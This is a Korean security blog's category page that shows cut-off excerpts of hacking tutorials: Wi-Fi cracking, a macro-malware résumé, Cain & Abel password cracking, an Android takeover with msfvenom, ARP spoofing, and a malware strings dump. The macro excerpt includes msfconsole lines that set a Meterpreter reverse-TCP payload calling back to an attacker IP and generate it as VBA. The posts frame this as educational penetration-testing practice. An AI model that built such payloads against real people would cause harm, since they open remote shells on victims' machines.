해킹 썸네일형 리스트형 Kali linux 를 이용한 와이파이 비밀번호 해킹하기. 안녕하세요! 오늘은 1집에 1개씩은 있다는 와이파이의 대해 포스팅해볼까 합니다. 스마트폰 보급 이후 남녀노소 누구나 알게된 단어 와이파이 wi-fi !! 이론설명은 뭐 위키 백과가 더 잘 해놓았으니.. 그쪽을 참조하시고 오늘은 이 와이파이 비밀번호 크랙 방법에 대해 포스팅 하겠습니다. 비밀번호 복잡성의 중요성을 깨달으시고, 무선랜의 취약점을 확인해보시기 바랍니다. 우선 컴퓨터가 와이파이를 사용하기 위해 AP 와 데이터 통신하는 과정을 알아야 합니다. 첫번째로, 무선AP탐색 과정을 거치게 됩니다. 스마트폰에서 와이파이를 켜시게 되면 탐색하게 되는데, 이 과정이 주변에 AP위치를 확인하는 과정입니다. 두번째로, AP를 선택하게 되고, 세번째로 인증을 받게 됩니다. AP의 인증을 받아 (비밀번호 확인 등) 허.. 더보기 MS오피스 매크로 취약점을 이용한 악성코드 이력서 만들기 안녕하세요! 오늘은 지난 스마트폰 해킹에 이어 MS오피스 매크로 취약점을 이용한 악성코드 이력서를 만들어 보도록 하겠습니다. (지긋지긋한 취업 스트레스가 만들어낸 분노의 결과물... oTL) 그럼 시작해 보겠습니다! 오늘은 시작전에, RC파일을 만들어 msfconsole 에서 손쉽게 설정하도록 하겠습니다. 명령어 > vi macro.rc (이름은 마음대로 정하셔도 됩니다) use windows/meterpreter/reverse_tcp set LHOST 192.168.219.188 (본인의 kail linux 설정한 IP를 입력하세요) set LPORT 4444 generate -t vba ( 버퍼오버플로우 공격때 알게된 내용인데, msfconsole 로 손 쉽게 공격 코드를 만들어 줍니다. vba 는 .. 더보기 보안의 3대요소 와 정보보호 대책 1.보안의3요소는 무었이고 각 요소에 대한 의미와 각 요소의 기술적인 내용은? 가. 가용성 자산이 적절한 시간에 인가된 당사자에게 서비스가 제공되어야 한다. 가용성의 위협요소 - DOS/DDOS 공격 등 나. 기밀성 정보 자산이 인가된 사용자에게만 의해 접근되어지는것을 보장 기밀성의 위협요소 - 도청 / 해킹 / 사회공학 해킹 / 도난 등 다. 무결성 정보 자산이 인가된 당사자에 의해서, 인가된 방법으로만 변경되는 것 무결성의 위협요소 - 트로이목마, 바이러스 등 2. 정보보호 대책을 분류할때에는, 관리적 보호대책, 물리적 보호대책, 기술적 보호대책 으로 분류할수 있다. 각 보호대책에 대한 방법은? 가. 관리적 보호대책 - 기업 등 민감한 정보를 보호가기 위한 인적, 행정적 정보보호 방안 - 보안관리 조.. 더보기 3.20 악성코드 분석 bind text로 추출 및 필요부분만 남김 File pos Mem pos ID Text ======== ======= == ==== 00000000289F 00000040289F 0 kernel32.dll 0000000028B7 0000004028B7 0 msvcrt.dll 0000000028CB 0000004028CB 0 JO840112-CRAS8468-11150923-PCI8273V 0000000028EF 0000004028EF 0 HASTATI. 000000002901 000000402901 0 %s*.* 000000002907 000000402907 0 Program Files 000000002915 000000402915 0 ProgramData 00000000292B 00000040292B .. 더보기 카인과 아벨을 이용한 계정 비밀번호 크랙 이번시간은 카인과 아벨 (Cain & Abel) 을 이용한 패스워드 크랙 방법 입니다. hash공부 중에 받은 툴인데, 재미삼아 사용해 보시기 바랍니다. 참고로 항상 말씀 드리지만, 공부용으로 사용하는 프로그램으로 만 사용하시기 바랍니다. * 실제 서버에 되지도 않고 되더라도 바로 적발됩니다 다운받아 XP에 넣어줍니다 ㅎ 설치후 첫 화면입니다. Cracker 탭에서, User Name 빈 곳에서 우클릭 -> Add to list -> Next 를 누르면 계정목록이 나타납니다. 저는 arcmir 라는 계정의 비밀번호를 탈취해 보도록 하겠습니다 arcmir 에서 우클릭을 하여, Dictionary Attack 중, LM Hashes 를 선택합니다. Brute-Force 공격도 가능하나 시간이... 흠.. 사.. 더보기 스마트폰 해킹 android 모의해킹 오늘은 kail linux를 이용한 스마트폰 해킹을 해보도록 하겠습니다. kail linux에 기본적으로 내장되어 있는 MATASPLOIT msfconsole 을 이용하고, msfvenom 으로 안드로이드 어플리케이션인 apk 파일로 만들어 설치하면 , kail 를 이용하여 스마트폰을 컨트롤 하는 부분입니다. * 아래 내용은 타인 및 실제 서버에 적용하면 법적 책임을 지게 됩니다. 본 포스팅은 기초 단계의 해킹으로, 실제 서버 공격시 바로 적발되게 됩니다 * 우선 이번 실험환경은 다음과 같습니다. 1. 유무선 공유기 2. 안드로이드 스마트폰 3. kail linux 1. 유무선 공유기를 통한 하나의 네트워크를 구성해 줍니다. 2. 안드로이드 스마트폰은 192.168.0.0 의 IP 를 할당해 주고, Ka.. 더보기 ARP 스푸핑 공격 (모의해킹) * 본 게시글은 해킹 기법의 하나이고, 실 서버, 실제 타인에게 사용하는것은 불법입니다. 해당 게시글에 나온 해킹기법은 교육용으로 널리 알려진 기법이고, 실제 서버에 적용할 경우 바로 적발됩니다. 해당 게시글을 개인의 교육목적 외 절대 사용을 금합니다. 가장 기본적인 ARP Spoofing 공격입니다. 로컬 네트워크에서 각 장비의 IP주소와 MAC주소간의 대응은 ARP 프로토콜을 통해 이루어지고, 공격자가 의도적으로, 특정한 IP의 MAC 주소를 공격자의 MAC주소로 변경하여 해당 IP로 보낼 패킷을 공격자에게 전송하게 하는 공격방식입니다. 보통 특정한 IP를 게이트웨이 IP를 스푸핑 하여 외부로 전송하는 모든 패킷을 공격자가 가로챌수 있으며, 클라이언트 - 게이트 웨이 두곳을 모두 스푸핑 하여 중간에서.. 더보기 이전 1 다음
